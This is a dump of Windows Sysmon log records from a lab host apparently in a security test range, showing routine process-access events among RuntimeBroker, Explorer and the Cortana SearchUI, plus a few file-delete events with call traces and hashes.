12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet 
Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=7A8AC65F0F6EB921AEB563EFAEC8909F,SHA256=A92EF78697E3A7AC06CC023453399E4C80ED9B953B0C2E06C8DF553AAB6D4C08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.754{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.754{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.754{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43564280C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43564280C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.754{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.739{266CAFBE-64C4-6064-9B00-00000000AE01}49244480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\ole32.dll+40d9|C:\Windows\System32\ole32.dll+7fb2e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+566aa|C:\Windows\System32\combase.dll+56851|C:\Windows\System32\combase.dll+56e26|C:\Windows\System32\combase.dll+c3aef|C:\Windows\System32\combase.dll+48c73 
10341000x800000000000000010795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.739{266CAFBE-64C4-6064-9B00-00000000AE01}49244480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\ole32.dll+80e96|C:\Windows\System32\ole32.dll+7fafa|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+566aa|C:\Windows\System32\combase.dll+56851|C:\Windows\System32\combase.dll+56e26|C:\Windows\System32\combase.dll+c3aef|C:\Windows\System32\combase.dll+48c73 23542300x800000000000000010794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.520{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B934B295A15F74582AA4242AF3036A8,SHA256=16B7E315E240D92FFD4158EF593E0B2F4F78829C8D5C55C90FB20D27508ED1BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.489{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D30FBCF365619DFBBAE056FB119CA7A,SHA256=BEC4D9F060DE5C83EE467F2E3D145FA373FAC886F865DA147EB43DC43B4A7204,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 